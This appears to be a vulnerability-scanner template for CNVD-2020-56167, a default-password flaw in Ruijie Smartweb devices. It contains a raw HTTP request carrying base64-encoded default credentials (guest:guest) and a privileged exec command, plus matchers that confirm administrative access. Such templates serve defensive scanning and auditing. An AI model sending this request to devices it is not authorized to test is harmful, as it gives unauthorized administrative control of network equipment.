## id: CNVD-2020-56167
## name: Ruijie Smartweb - Default Password
## author: hack007x
## severity: low
## tags: cnvd,cnvd2020,ruijie,default-login,vuln
## description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
## reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
## reference: https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
## verification: true

POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

#@ condition: and
#@ matcher: body contains "Level was: LEVEL15"
#@ matcher: body contains "/WEB_VMS/LEVEL15/"
#@ matcher: status_code == 200





# @VEIL-STAMP: 09d9c5e22d127f51110e7fa7fb13377b638c73f18fe82e88bcab1b3897fc9af9
